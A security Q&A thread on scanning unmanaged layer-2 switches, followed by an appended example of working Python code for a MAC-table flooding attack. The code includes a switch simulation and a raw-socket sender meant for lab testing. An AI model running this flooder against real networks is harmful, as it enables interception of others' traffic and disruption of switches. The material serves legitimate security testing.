
The target switches do not have IP addresses and most scanners require IPs as targets.

Can you scan unmanaged switches with vulnerability scanners? What scanners can target layer 2?

Ciglo
    So, you are looking for a layer 2 scanner. Because you are looking for layer 2 devices, then your vulnerability scanning is almost unnecessary at this level. Any threat would have to be physically local to the device. Is that within your scope? – schroeder Dec 14 '18 at 10:45

1 Answer


The target switches do not have IP addresses and most scanners require IPs as targets.

Can you scan unmanaged switches with vulnerability scanners? What scanners can target layer 2?

It's useful to keep the OSI model in mind.

An unmanaged switch without an IP solely operates on layer 2. It doesn't know about the higher layers, nor does it care. It looks up the destination MAC in its table, and switches the packets accordingly. This is done in silicon.

Vulnerability scanners work on layers 4 and up, depending on what they target. For instance, a vulnerability scanner looking for problems in Apache doesn't really care about anything other than the application.

Running such tools against an unmanaged switch is just a waste of time. You won't learn anything. Instead you should look at how the switch behaves if you do attacks targeted against L2 devices. Can you fill up the MAC table? Can you crash the switch with malformed packets? Can you do ARP poisoning successfully?

That said: unmanaged switches are simple devices. They commonly do not have a general-purpose CPU, and no code is running on such switches.

vidarlo
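The MAC-table-fill test the answer suggests, as an added example that is not part of vidarlo's answer or the original question. It builds raw Ethernet frames with random source MACs, models a learning switch with a bounded MAC table to show what an attacker gains once the table is full (frames for hosts that can no longer be learned get flooded to every port, including the attacker's), and includes a Linux raw-socket sender for running the same frames against a real switch in a lab. The table size, port layout, MAC addresses and interface name are assumptions; real switch silicon differs per chip.

```python
"""MAC-table-fill test for an unmanaged switch (added example, not from the
original post).  Table size, ports, MACs and interface name are assumptions."""
from __future__ import annotations

import os
import socket
import struct

ETH_HDR = struct.Struct("!6s6sH")   # dst MAC, src MAC, EtherType
ETHERTYPE_IPV4 = 0x0800
BROADCAST = b"\xff" * 6
MIN_FRAME = 60                      # 64 bytes on the wire minus the 4-byte FCS the NIC adds


def random_unicast_mac() -> bytes:
    """Random MAC with the multicast bit clear and the locally administered
    bit set, so the switch treats it as an ordinary host address."""
    b = bytearray(os.urandom(6))
    b[0] = (b[0] & 0xFE) | 0x02
    return bytes(b)


def build_frame(dst: bytes, src: bytes, ethertype: int = ETHERTYPE_IPV4,
                payload: bytes = b"") -> bytes:
    """Ethernet II frame, zero-padded to the minimum frame size."""
    if len(dst) != 6 or len(src) != 6:
        raise ValueError("MAC addresses must be 6 bytes")
    return (ETH_HDR.pack(dst, src, ethertype) + payload).ljust(MIN_FRAME, b"\x00")


def flood_frames(count: int) -> list[bytes]:
    """`count` broadcast frames, each from a fresh random source MAC, so every
    frame forces the switch to learn one more table entry."""
    return [build_frame(BROADCAST, random_unicast_mac()) for _ in range(count)]


class LearningSwitch:
    """Model of an unmanaged switch with a bounded MAC table (size is an
    assumption).  Learns src -> port, forwards known destinations to one port,
    floods unknown ones to all other ports, and silently stops learning once
    the table is full."""

    def __init__(self, ports: int, table_size: int) -> None:
        self.ports = list(range(1, ports + 1))
        self.table_size = table_size
        self.table: dict[bytes, int] = {}

    def receive(self, frame: bytes, in_port: int) -> list[int]:
        """Return the list of ports the frame is forwarded to."""
        dst, src, _ = ETH_HDR.unpack_from(frame)
        if src not in self.table and len(self.table) < self.table_size:
            self.table[src] = in_port
        out = self.table.get(dst)
        if out is not None:
            return [] if out == in_port else [out]      # known: unicast (or filter)
        return [p for p in self.ports if p != in_port]  # unknown: flood


def mac_flood_demo(table_size: int = 1024) -> dict[str, list[int]]:
    """Hosts A (port 1) and B (port 2), attacker on port 3.  Returns which ports
    receive A's frame to B with an empty table ("before") versus after the
    attacker has filled it ("after").  A and B's entries are modelled as aged
    out, which is what a sustained flood causes on a real switch."""
    mac_a, mac_b = b"\x02\x00\x00\x00\x00\x0a", b"\x02\x00\x00\x00\x00\x0b"

    sw = LearningSwitch(ports=4, table_size=table_size)
    sw.receive(build_frame(mac_a, mac_b), in_port=2)        # B speaks first, B is learned
    before = sw.receive(build_frame(mac_b, mac_a), in_port=1)

    sw = LearningSwitch(ports=4, table_size=table_size)
    for f in flood_frames(table_size):
        sw.receive(f, in_port=3)                             # attacker fills the table
    sw.receive(build_frame(mac_a, mac_b), in_port=2)        # B can no longer be learned
    after = sw.receive(build_frame(mac_b, mac_a), in_port=1)
    return {"before": before, "after": after}


def send_frames(iface: str, frames: list[bytes]) -> int:
    """Put frames on the wire through a Linux AF_PACKET raw socket (needs root).
    Not exercised offline; the interface name is an assumption."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return sum(s.send(f) for f in frames)


if __name__ == "__main__":
    print(mac_flood_demo())
    # send_frames("eth0", flood_frames(10000))   # only on an isolated lab network
```

With the default table size the demo returns `{'before': [2], 'after': [2, 3, 4]}`: once the table is full, A's unicast to B is flooded to the attacker's port as well. Against a physical switch, run `send_frames` from one port while capturing on another and watch whether unicast traffic between two other hosts starts appearing; also watch whether the switch keeps forwarding at all, since the answer's other question (can malformed or excessive traffic crash it) is answered by the same setup.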